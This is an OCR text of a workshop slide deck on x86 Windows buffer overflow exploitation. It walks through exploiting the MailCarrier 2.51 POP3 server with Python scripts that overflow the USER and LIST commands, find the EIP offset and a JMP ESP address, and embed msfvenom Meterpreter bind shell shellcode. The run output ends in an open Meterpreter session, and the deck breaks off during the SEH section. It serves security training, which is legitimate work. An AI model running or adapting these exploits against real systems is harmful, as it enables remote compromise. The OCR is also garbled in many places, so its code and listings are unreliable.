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Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows 
Instructor - Dino Covotsos - Telspace Systems 
Co-Instructor - Manuel Corregedor 
@telspacesystems 


Whoami (x2) ? 
We work in the Penetration Testing space (Telspace Systems) 
Approximately 20 years in 
Trying to keep some sort of work/life balance! ;) 


Various qualifications, degrees etc 


Agenda 


- Introduction to the workshop(We are here!). 

- The Stack and Registers. 

- Basic x86 ASM. 

- Basic exploitation technigues. 

- Fuzzing. 

- Introduction to variety of Skeleton Python scripts(copy 
paste buffer overflows, remote buffer overflows etc). 


Agenda 


- Vanilla EIP overwrites in Immunity Debugger. 

- Overwriting EIP, Jumping to ESP, executing Shellcode 
(generated by Metasploit or compiled from exploit-db/ 
shellstorm). 

- Bad characters and how to deal with them. 

- Practical example. 


Agenda 


- Introduction to SEH exploitation technigues. 
- Introduction to Mona, basic asm jumps and shell coding. 
- Practical examples. 


Agenda 


- What are egg hunters? 
- Example of a egg hunter being utilised in a SEH exploit. 
- Ouestions and Answers. 
- References. 


The Stack and Registers(x86) 


The 8 32 bit General Purpose Registers: 


Accumulator register (AX). Used in arithmetic operations 

Counter register (CX). Used in shift/rotate instructions and loops. 

Data register (DX). Used in arithmetic operations and I/O operations. 

Base register (BX). Used as a pointer to data (located in segment register DS, when in 
segmented mode). 

Stack Pointer register (SP). Pointer to the top of the stack. 

Stack Base Pointer register (BP). Used to point to the base of the stack. 

Source Index register (SI). Used as a pointer to a source in stream operations. 
Destination Index register (DI). Used as a pointer to a destination in stream operations. 


IEL 


The Stack and Registers(x86) 


— 16 bits — 


8 bits 8 bits 


General-purpose Registers 


ESP 
(stack pointer) 


EBP 
(base pointer) 


32 bits 


REF: http://flint.cs.yale.edu/cs421/papers/x86-asm/asm.html amic eG 


Basic x86 ASM 


X86 ASM (for this workshop): 


add/sub 

xor 

mov 

push 

pop 

call 

jmp (and conditional jumps) 


Basic exploitation technigues 


“Vanilla” EIP Overwrite: 

Direct EIP overwrite with initial long buffer(no exception handler or similar) 
Structured Exception Handling(SEH) exploitation: 

An exception is an event that occurs during the execution of a program, and requires 
the execution of code outside the normal flow of control. Structured exception 


handling is a mechanism for handling both hardware and software exceptions. 


Overwrite SEH with a POP POP RET instruction, ESP moved towards higher instructions 
twice then a RET is executed. 


[EL 


= = Æ =- 


REF: https://docs.microsoft.com/en-us/windows/desktop/debug/structured-exception-handling 


Basic exploitation technigues 


Structured Exception Handling(SEH) exploitation(continued): 
Typical structure: 


“A” buffer + (Next SEH)/JMP + PPR + (nops) + shellcode 


Basic exploitation technigues 


Egghunters: 


A egghunter is a small piece of shellcode that searches memory for a larger, bigger 
shellcode where it may be possible to execute said shellcode (i.e. in cases where there 
is only a small amount of space available in the buffer, this is very useful) 


Egghunters search for a "TAG" which is a unique 4 byte string, in memory. We then 
combine a string together so that it is unigue, such as WOOTWOOT or similar where 
we want to execute our actual shellcode once found(i.e. we redirect execution flow). 


“TEL 


— 
Hackers for Hire 


Basic exploitation technigues 


Egghunters, example: 


loop inc page: 


or dx, OxOfff || Add PAGE. SIZE. 1 to edx 
loop inc one: 
inc edx // Increment our pointer by one 
loop check: 
push edx || Save edx 
push 0x2 | | Push NtAccessCheckAndAuditAlarm 
pop eax || Pop into eax 
int Ox2e / | Perform the syscall 
cmp al, 0x05 // Did we get 0xc0000005 (ACCESS VIOLATION ;? 
pop edx /| Restore edx 
loop check 8 valid: 
je loop inc page // Yes, invalid ptr, go to the next page 
is egg: 
mov eax, 0x50905090 // Throw our egg in eax 
mov edi, edx // Set edi to the pointer we validated 
scasd // Compare the dword in edi to eax 
jnz loop inc one // No match? Increment the pointer by one 
scasd // Compare the dword in edi to eax again (which is now edx + 4) 
jnz loop inc one // No match? Increment the pointer by one 
matched: 


jmp edi // Found the egg. Jump 8 bytes past it into our code. 


Fuzzing 


Google Definition: 

Fuzzing or fuzz testing is an automated software testing technique that involves 
providing invalid, unexpected, or random data as inputs to a computer program. The 
program is then monitored for exceptions such as crashes, failing built-in code 
assertions, or potential memory leaks. 


Manual Testing (Generation, mutation, manual coding etc) 


Tools: Spike, Boofuzz, Peach, Sulley etc 


“TEL 


— 
Hackers for Hire 


Fuzzing 


Basic Spike Template: 


s string variable" USER"); 
s string(' "5; 

s string variable("FOO"); 
s string, WN); 

s string( PASS "); 

s string variable("FOO"); 

s string variable("\r\n"); 


Skeleton Python Scripts 


On your USB/VM there are additional scripts: 


Copy/Paste Skeleton Python Scripts (Local BOF example, SEH) 


Shellcode = “<SHELLCODE>” 
buffer = "A" * 884 + NSEH + GEHT + NOPS + shellcode + "D" * 8868 


payload = buffer 
try: 
f=open("exploit.txt","w") 
print "[+] Creating %s bytes payload.." %len(payload) 
f.write(payload) 
f.close() 
print "[+] File created!" 
except: 
print "File cannot be created" 


Skeleton Python Scripts 


Socket Based Skeleton Python Scripts (Local BOF example, Vanilla) 


buffer = "A" * 5094 + ”JMP ESP" + NOPS + "C" * (882-len(shellcode)) 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" 
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
s = socket.socket(socket.AF INET, socket. SOCK STREAM) 
connect=s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

s.send('USER ' + buffer + ^n") 

print s.recv(1024) 

s.send(‘QUIT\r\n’) 

s.close() 

time.sleep(1) 

print "[*] Done, but if you get here the exploit failed!" 


Vanilla EIP Overwrite 


41414141 — The Magic Numbers. 


Our aim in this portion of the workshop is to overwrite the EIP register by sending a 


long string, which will allow us to redirect program execution flow to shellcode of our 
choosing. In this case, it would be calc.exe or a bind shell. 


Vanilla EIP Overwrite (MailCarrier) 


= MailCarrier 2.5 
Action View Help 
» 29928238 o [un 


| Server/Domain Tree ^ x| | MailCarrier | 


= S MailCarrier | H 
home MailCarrier 2.5 
F E 


Mail Server | < 


jä | _Category Description il 


SN [Z] Task ut 


Done 


Vanilla EIP Overwrite (MailCarrier) 


ES 
= 


&] X p ll bi HP li] lemtwhcPkbzr.s? H 


Attaching to the MailCarrier process, using Immunity Debugger (on your VM) 


Run program <F9> 


Vanilla EIP Overwrite (MailCarrier) 


à Immunity Debugger - pop3.exe - [CPU - thread 00000F6C, module ntdll] 
[c ] File View Debug Plugins ImmLib Options Window Help Jobs 


loe m tw hc Eb Zr 
MOU EDI,EDI 
INTS 


MOU EDI,EDI 


4 
MOU ERX,DWORD PTR FS:[18] 


PUSH EDI 
MOU EDI, 
MOV EDX, 
MOV DWORD PTR DS: [EDX1, Ø 
MOV DWORD PTR DS: [EDX+4J, EDI 
OR EDI,EDI 

SHORT ntdll.7C991259 

C BREDERE 


Ha 
AS BYTE PTR ES: [EDI] 


U ECX,ØFFFF 
U WORD PTR DS: (EDX+21,CX 
D PTR OS: CEDXI,C 


turned b 
dent 


s 


A 


ntdll.7C98120F 
OCFFFFFFFF) 
O(FFFFFFFF) 
FFFFFFFF) 
FFFFFFFF) 
?FFDROaa(FFF) 


B ë 

FFFFFFFF of SEH chain 

7C90E920 BE! S dler 
6! ntdll.? 


2149 from ntdll.DbaBreakPoint 


Running 


GNU nano 3.2 vanillal.py 


%len (buffer) 
socket.socket(socket.AF INET, socket.SOCK STREAM) 
connect-s.connect(( , 110)) 
print s.recv(1024) 


s.send( + buffer + 
print s.recv(1024) 


Vanilla EIP Overwrite (MailCarrier 


< < < < < < < < 


)— C» OD 


roe 


2bit 
NULL 


DAJNNDTUTO 


T 


ERROR SUCCESS (66900900 


66616212 (NDO, NË, NE, A, NS, PO, GE, G) 


empty 
npty 
mptu 
mptu 
empty 

; empty 
5 empty 
empty 


Vanilla EIP Overwrite (MailCarrier) 


:~/hacktobasics# msf-pattern create -1 6000 
Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9ACOACIAC2AC3ACAACSACO6AC7AC8AC9AdOAd1Ad2Ad 
3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9AfOAf 1AT2AT3ATAATSATOAT7ATSAT9AgO0Ag1Ag2Ag3Ag4Ag5Ag6A 
g7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9A10A11Ai2Ai13Ai4Ai15A16Ai7A18A19Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj 7Aj8Aj 9AKO 
AK1Ak2AK3AKA4AKSAK6AK7AK8AK9A10A11A12A13Al14A15A16A17A18Al19AmOAm1Am2Am3Am4Am5Am6Am7Am8Am9AnOAn1An2An3An 
4An5An6An7An8An9A00A01A02A03A04A05A06A07A08A09Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq03Aq4Aq5Aq6Aq7A 
q8Aq9ArOArlAr2Ar3Ar4Ar5Ar6Ar7Ar8ATr9ASO0AS1AS2AS3AS4AS5AS6AS7ASBASSAtOATt1At2At3At4At5At6At7At8At9AuOAUT 
Au2Au3Au4Au5Au6Au7Au8Au9AvOAv 1Av2AV3AVA4AVS5AV6AV7AVBAV9AwOAW1AW2AW3AW4AWS AW6AW7AW8AW9AXOAX1AX2AX3AXA4AX 
5AxX6AX7AX8AX9AyOAy 1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9AZ0AZ 1A22AZ23AZ4AZ5AZ26AZ7AZ8Az9Ba0BalBa2Ba3Ba4Ba5Ba6Ba7Ba8B 
a9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9BcOBC1BC2BC3BCABC5BC6Bc7Bc8Bc9BdOBd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9BeOBe1Be2 
Be3Be4Be5Be6Be7Be8Be9Bf OBf 1Bf 2Bf 3Bf ABf5Bf6Bf7BfÍ8BfÍ9BgOBg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh 
6Bh7Bh8Bh9BiOBilBi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj 1Bj 2Bj 3Bj 4Bj 5Bj 6Bj 7Bj 8Bj 9BKOBk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9B 
lOBl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9BmOBm1Bm2Bm3Bm4Bm5Bm6Bm7 Bm8Bm9BnOBn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3 
Bo4B05B06B07B08Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9BrOBr1Br2Br3Br4Br5Br6Br 
7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9BtOBt 1Bt2Bt 3Bt ABt5Bt6Bt 7Bt 8Bt 9BuOBulBu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0OB 
V1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0OBw1Bw2Bw3Bw4Bw5Bw6Bw7BW8Bw9BXOBX1Bx2BXx3BX4Bx5BXx6Bx7Bx8Bx9ByOBy 1By2By3By4 
By5By6By7By8By9Bz0Bz 1BzZ2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0CalCa2Ca3Ca4Ca5Ca6Ca7Ca8Ca9CbOCb1Cb2Cb3Cb4Cb5Cb6Cb7Cb 
8Cb9CcOCciCc2Cc3Cc4Cc5Ccó6Cc7Cc8Cc9Cd8Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9CeO0CelCe2Ce3Ce4Ce5Ce6Ce7Ce8Ce9CfOCf 1C 
f2Cf3CfaACf5Cf6Cf7Cf8Cf9CgOCg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9ChO8Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9CiO0CilCi2Ci3Ci4Ci5 
Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj 9CKOCK1CkK2CK3CKk4Ck5CK6Ck7CK8CKk9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl 
9CmoCm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9CnOCnl1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co8Co1Co2Co3Co4Co5Co6Co7Co8Co9CpOCp1Cp2C 
p3Cp4Cp5Cp6Cp7Cp8Cp9CqO0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9CroCr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6 
Cs7Cs8Cs9CtOCt1Ct2Ct3Ct4Ct5Ctó6Ct7Ct8Ct9CuOCulCu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9CvOCv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw 
OCwl1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9CXO0CXx 1CX2CX3CX4CXx5Cx6Cx7CXx8Cx9CyOCy 1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz 1C22Cz 3C 


Generating a unique pattern with msf-pattern create with length 6000 


Vanilla EIP Overwrite (MailCarrier) 


GNU nano 3.2 vanillal.py Modified 


import sys 
import socket 
import time 


buffer = "Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0AblAb2Ab3Ab4Ab5Ab6Ab7Ab8Ab9AC0AC1AC2AC3AC4AC5AC6AC7AC8AC9$ 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" 

print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
socket.socket(socket.AF INET, socket.SOCK STREAM) 

connect=s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

s.send('USER ' + buffer + ‘\r\n') 

print s.recv(1024) 

s.send('QUIT\r\n') 

s.close() 

time.sleep(1) 

print "[*] Done, but if you get here the exploit failed!" 


Python script, with unique pattern to send to MailCarrier 


Vanilla EIP Overwrite (MailCarrier) 


:-/hacktobasics/Vanilla# python vanilla2-pattern-create. py 
[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command 


[*] Sending pwnage buffer: with 6000 bytes... 
+OK <492.1556614920@>, TABS Lab POP3 server ready. 


Executing the script, which carries the unigue pattern. 


Vanilla EIP Overwrite (MailCarrier) 


isters (FPU) < < < < < < < < < < < < < < 
DDDDDDDD 


Re 


jodGo5Go6Go?GoSGo9GpaGpiGpzGp3Gp4Gp5GpéGp?7GpSGp9Gqa8GqiGq2aGq3Gqd4dGq5Gg6Gq? 6G: 


"| Dg" 


"pSGp6GprGpsGp9Gq8Gq 1 Gq2Gq3Gq4Gq5Gq6Gq7Gq8GQ9Gr6Gr 1Gr2 ir4GrSGréGr7Gr8Gr9Gs0Gs1Gs 


atFFFFFFFF) 
bit O(FFFFFFFF) 
bit O(FFFFFFFF) 
bit BtFFFFFFFF) 
bit 7FFDS990( 


) NULL 


LastErr 
66616212 


DAONDIO uMulululululululu 


Vanilla EIP Overwrite (MailCarrier) 


# msf-pattern offset -q 47386E47 


# I 


[*] Exact match at offset 5094 


Using msf-pattern_offset in order to obtain the exact offset, in this case 5094 bytes. 


[EL 


EH 
Hackers for Hire 


Vanilla EIP Overwrite (MailCarrier) 


GNU nano 3.2 vanilla3-B-Overwrite.py 


import sys 
import socket 
import time 


buffer = "A" + 5094 + "B" * 4 + "C" * (6000-4-5094) 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" 
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
s = socket.socket(socket.AF INET, socket.SOCK STREAM) 
connect-s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

s.send('USER ' + buffer + '\r\n') 

print s.recv(1024) 

s.send('QUIT\r\n') 

s.close() 

time.sleep(1) 

print "[*] Done, but if you get here the exploit failed!" 


We create our "B" buffer, to confirm the exact offset and EIP overwrite. 


Vanilla EIP Overwrite (MailCarrier 


at FFFFFFFF) 
atFFFFFFFF) 
Bt FFFFFFFF) 
6(FFFFFFFF) 
PFFDS000(FFF) 


TEE 


C 
P 
A 
e 8 
1 
D 


EE 


C ERR 
` (NO, NB, NE, B, NS, PO, GE, G) 


i mt 


4 empty 
5 empty 
empty 
empty 


Vanilla EIP Overwrite (MailCarrier) 


b49. dI L) 
dll) 


00000" 


farterterterterterter 
4444-4444 4 


15.dl 0) 


# 
# 
# 
# 
# 
# 
# 
# 
# 
# d 
# d 
# d 
# 
# 
# 
# 
# 
# 
# 
# 


ily 


This mona. 


!mona jmp -r esp 


We search for a JMP ESP to overwrite EIP with, via mona with “!mona jmp -r esp” 


Vanilla EIP Overwrite (MailCarrier) 


GNU nano 3.2 


vanilla4-jmp-esp.py 


import sys 
import socket 
import time 


jmp = “\x59\x30\x02\x1b" 
buffer = "A" * 5094 + jmp + "C" * (6000-4-5094) 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" 

print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
socket.socket(socket.AF INET, socket.SOCK STREAM) 

connect=s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

s.send('USER ' + buffer + ‘\r\n') 

print s.recv(1024) 

s.send('QUIT\r\n') 

s.close() 

time.sleep(1) 

print "[*] Done, but if you get here the exploit failed!" 


Vanilla EIP Overwrite (MailCarrier) 


PUSH ESP 


|, DWORD PTR SS: [CESP+7ØJ 
CX, DWORD PTR SS: CESP+6C] 

PUSH ESI 
EBP, DWORD PTR DS:[EBX+38] 


DWORD PTR SS:LE 
AL,BYTE PTR DS: 
H 


Se DWORD PTR SS: CEBPI 


[02:11:29] Breakpoint at msjet40.1B923059 


1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
1 


© CU CU CU rm CU CU rm rm CO rm CU CU CU CU CU CU CO CO CO CU CU CO CO CO CO CO E 


Vanilla EIP Overwrite (MailCarrier) 


root@pewpew: # mstvenom -a x80 --plattorm windows -p windows/meterpreter/bind tcp LPORI=443 -b "4x00Xxd9" -T c 
Found 11 compatible encoders 

Attempting to encode payload with 1 iterations of x86/shikata ga nai 
x86/shikata ga nai failed with An encoding exception occurred. 
Attempting to encode payload with 1 iterations of generic/none 
generic/none failed with Encoding failed due to a bad character (index-3, char=0x00) 
Attempting to encode payload with 1 iterations of x86/call4 dword xor 
x86/call4 dword xor succeeded with size 336 (iteration=0) 

x86/call4 dword xor chosen with final size 336 

Payload size: 336 bytes 

Final size of c file: 1437 bytes 

unsigned char buf[] = 
"Ax29\xc9\x83\xe9\xb2\xe8\xfF\XFF\XFF\XFF\xCO\x5e\x81\x76\x0e" 
"\x7a\xaa\x8e\x68\x83\xee\xfc\xe2\xf4\x86\x42\x0c\x68\x7a\xaa" 
"\xee\xel\x9f\x9b\x4e\xOc\xf1\xfa\xbe\xe3\x28\xa6\x05\x3a\x6e" 
"Ax21\xfc\x40\x75\x1d\xc4\x4e\x4b\x55\x22\x54\x1b\xd6\x8c\x44" 
"\x5a\x6b\x41\x65\x7b\ x6d\ x6c\x9a\x28\xfd\x05\x3a\x6a\x21\xc4" 
"\xX54\xF1\xe6\x9F\xX10\x99\ xe2\x8F\xb9\x2b\x21\xd7\x48\x7b\x79" 
"\xO5\xX21\x62\x49\xb4\x21\xf1\x9e\x05\x69\ xac\x9b\x71\xc4\xbb" 
"\x65\x83\x69\xbd\x92\x6e\ x1d\x8c\xa9\xf3\x90\x41\xd7\xaa\x1d" 
"\x9e\xf2\x05\x30\x5e\ xab\x5d\x0e\xf1\xa6\xc5\xe3\x22\xb6\x8f" 
"\xbb\xf1\xae\x05\x69\ xaa\x23\xca\x4c\x5e\xFf1\xd5\x09\x23\xfo" 
"\xdf\x97\x9a\xF5\xd1\x32\xf1\xb8\x65\xe5\x27\xc2\xbd\x5a\x7a" 
"\xaa\xe6\x1f\x09\x98\xd1\x3c\x12\xe6\xf9\x4e\x7d\x55\x5b\xd0" 
"\xea\xab\x8e\x68\x53\ x6e\ xda\x38\x12\x83\x0e\x03\x7a\x55\x5b" 
"\xO2\x71\xf3\xde\x8a\x87\xcO\x8f\x02\x78\xc2\x64\ x67\xa5\x4a" 
"\x71\xbd\xed\xc2\x8c\x68\x7b\x11\x07\x8e\x10\xba\ xd8\x3f\x12" 
"\x68\x55\x5f\x1d\x55\x5b\ xed\xba\xdf\xd6\x3f\x12\x1d\x67\x50" 
"\x85\x55\x5D\x3F\xX12\xde\ x62\x53\x9b\x55\x5b\x3Ff\xed\xc2\xfb" 
"\x06\x37\xcb\x71\xbd\x10\xaa\xe4\x6c\x2c\xfd\xe6\x6a\xa3\ x62" 
"\xd1\x97\xaf\x29\x76\x68\ x04\x87\x05\x5e\x10\xea\ xe6\ x68\x6a" 
"\xaa\x8e\x3e\x10\xaa\xe6\x30\xde\xf9\x6b\x97\xaf\x39\xdd\x02" 
"\x7a\xfc\xdd\x3F\x12\xa8\x57\xa0\x25\x55\x5b\xeb\ x82\ xaa\x fo" 
"Ax6f\x7b\x69\xa7\xae\x0f\x43\x4d\xd3\x8a\x1f\x2c\x3e\x10\xaa" 
"\xdd\x97\xaf\xaa\x8e\ x68"; 


Generating our bind_tcp shellcode, with msfvenom. 


UNU Nano 3.4 VAIHLULAI -0PS -SIIELLCOUC. py 


import sys 
import socket 
import time 


jmp = "\x59\x30\x02\x1b" 


Shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xce\x5e\x81\x76\x0e" 
"\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\xOb\x44\x9b" 
"\x7b\x82\xal\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50" 
"\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27" 
"\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51" 
"\xX37\xcf\xd7\x0a\x73\xa7\xd3\xla\xda\x15\x10\x42\x2b\x45\x48" 
M X90\X42\x5C\xX78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85" 
"\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7Ff\xe6\x3Ff\x7e" 
"A xaO\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\xla" 
M\xd8\xcf\x9f\x90\x0a\x94\x12\Xx5f\x2f\x60\xc0\x48\x6a\xid\xcl" 
“\xda\xf4\xad4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44" 
M\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3" 
"\ xd4\x9a\x1lb\xOb\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce" 
"\xX61\x4F\xc2\x4b\xe9\xb9\xFf1\xla\x61\x46\xf3\xf1\x04\x9b\x7b" 
"\ xe4\xde\xd3\xf3\x19\xOb\x45\x20\x92\xed\x2e\x8b\x4d\x5ce\x2ce" 
M\x59\xcO\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33" 
“\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e" 
"\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53" 
M\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54" 
"\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61" 
"\xX44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65" 
M\xOc\x45\x58\x32\xcd\x31\x72\xd8\xb8\xb4\x2e\xb9\x5d\x2e\x9b" 
"\x48\xf4\x91\x9b\x1b\x0b" ) 


Placing it in to our Python script (1/2). 


Vanilla EIP Overwrite (MailCarrier) 


buffer = * 5094 + jmp + * 10 + shellcode + * (6000-len(jmp)-len(shellcode)-5094-10) 
Mrint 

print %len(buffer) 
s = socket.socket(socket.AF INET, socket.SOCK STREAM) 
connect=s.connect ( ( , 110)) 

print s.recv(1024) 

s.send( + buffer + ) 

print s.recv(1024) 

s.send( ) 

s.close() 

time.sleep(1) 

print 


Placing it in to our Python script (2/2). 


Vanilla EIP Overwrite (MailCarrier) 


:-/hacktobasics/Vanilla# python vanilla5-nops-shellcode. py 
[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command 


[*] Sending pwnage buffer: with 6000 bytes... 
+OK <3500.1556616527@>, TABS Lab POP3 server ready. 


Executing our Python script (full exploit). 


R 
[e] 
D FE «x pli 


zoo EL 


EDI,EDI 


EDI,EDI 
EAX, DWORD PTR SP*41 


4 
EAX, C:\Documents and Settings\test>netstat -an ifind "443" 
EDI TCP ø.0.0.0:443 6.6.6.6:6 LISTENING 
EDI, DWORD PTR SS: [ESP+C] TCP 192.168.0.150:1153 104.244.42.200:443 ESTABLISHED 
EDX, DWORD PTR [ESP483 TCP 192.168.0.150:1162 216.58.223.67:443 TIME WAIT 
N EDI TCP 192.168 .6.156:1163 216.58 .223 .67:443 TIME_WAIT 
EDI, EDI ' TCP 192.168.0.150:1164 216.58.223.67:443 TIME WAIT 
TCP 192.168 .6.156:1165 216.58 .223 .67:443 TIME_WAIT 


ECX, FFFFFFFF 
EAX, ER . 
C:\Documents and Settings\test> 


MST explolt( ) > show options 
odule options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/meterpreter/bind tcp): 


Name Current Setting Required Description 


EXITFUNC process Exit technique (Accepted: '', seh, thread, process, none) 
LPORT 443 The listen port 
RHOST 192.168.0.150 The target address 


Exploit target: 
Id Name 


[0] Wildcard Target 


exploit( ) » run 

Started bind TCP handler against 192.168.0.150:443 

Sending stage (179779 bytes) to 192.168.0.150 

Meterpreter session 1 opened (192.168.0.240:43473 -> 192.168.0.150:443) at 2019-04-30 11:30:28 +0200 


meterpreter > Ë 


Using Meterpreter to connect to the bind shell. 


SEH exploitation 


41414141 — Still the magic numbers, just different! 


Structured exception handling exploits compromise an application by overwriting the 
pointer of an exception handler with an attacker controlled address. 


The "Structured Exception Handler (SEH)” is a protection mechanism that was 
implemented to mitigate the abuse of buffer overflows, but it is a highly flawed one. 


Je 


REF: https://www.fuzzysecurity.com/tutorials/expDev/3.html 


GNU nano 3.2 sehl.py 


buffer = "A" * 10000 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n" 

print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
socket.socket(socket.AF INET, socket.SOCK STREAM) 

Connect-s.connect(("192.168.0.151g, 110)) 

print s.recv(1024) 


print "[*] Sending USERNAME\r\n" 
s.send('USER test' + ‘\r\n') 

print s.recv(1024) 

print "[*] Sending PASSWORD\r\n" 
s.send('PASS test" + ‘\r\n') 

print s.recv(1024) 

print "[*] Sending Evil LIST buffer\r\n" 
s.send('LIST ' + buffer + '\r\n') 

print s.recv(1024) 

s .send('QUITVrAn') 

s .close() 

Itime.sleep(1) 

print "[*] Done, but if you get here the exploit failed!" 


Skeleton Python script to exploit the LIST command, post authentication (test/test) 


SEH exploitation 


:-/hacktobasics/SEHf python sehl.py 
MailCarrier 2.51 POP3 Buffer Overflow in LIST command 


Sending pwnage buffer: with 10000 bytes... 
<2260.1556618285@>, TABS Lab POP3 server ready. 


Sending USERNAME 
test is known here. 


Sending PASSWORD 


Welcome! 0 messages (0 bytes) 


Sending Evil LIST buffer 


Sending 10000 A's via the LIST command. 


[c] File View Debug Plugins Immlib Options Window Help Jobs - & x 


FH Ji +] -i lemt wh cPk bzur-s-? Immunity: Consulting Services Manager 


MOU BYTE PTR DS:LEDX],RL 
INC DWORD PTR DS: EECH UU iwa 
MOUZX EAX, A ; 


AL 
N 07010898 
SHORT pop3.9041RC31 | Si 
PUSH ECH x 07020000 


‘ 96600169 

S P 070105F8 

EES: BØ41A3B4 070105F8 
01C02SRC ASCII 

60701086C 


BB41AC1D pop3.9841AC1 


H AC3E 
OR DWORD PTR DS:LERXl,FFFFFFFF 
POP EBP 


INC DWORD PTR DS: CEAXI 
POP EBP 


OOo 


OCFFFFFFFF) 
7FFD4900(FFF) 


DANNDTUTO 
OOS 


PUSH ESI mx : : 
PUSH EDI LastErr ERROR IO PENDING (@00003E5) 


MOU EDI, 3 00010202 (ND, NB, NE, A, NS, PO, GE, 6) 


empty 
empty 

mpty 
empty 
empty 
empty 


RETURN to po 4 3 from pop3.0841RCOD 


II "B" 


RETURN to p 
RSCII 


CII "RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR 


RETURN to ntdll.7C916546 from ntdll.7C90E 


UNICODE "inetinfo.e: 


SEH exploitation 


Registers (FPU) < < < < < < < ES 
Ax aaaaaaaa L te 


41414141 
7 ntdll. ; Address |SE handler 


OCFFFFFFFF) 
O(FFFFFFFF) 

t O(FFFFFFFF) 

t BLFFFFFFFF) 
7FFD4900(FFF) 


T 


) (5) co ce (D + EI 


C ERROR IO PENDING (466 
66616246 (NO,NB,E,BE,NS,PE,GE,LE) 


EIP is now overwritten, the SEH chain our A's. 


SEH exploitation 


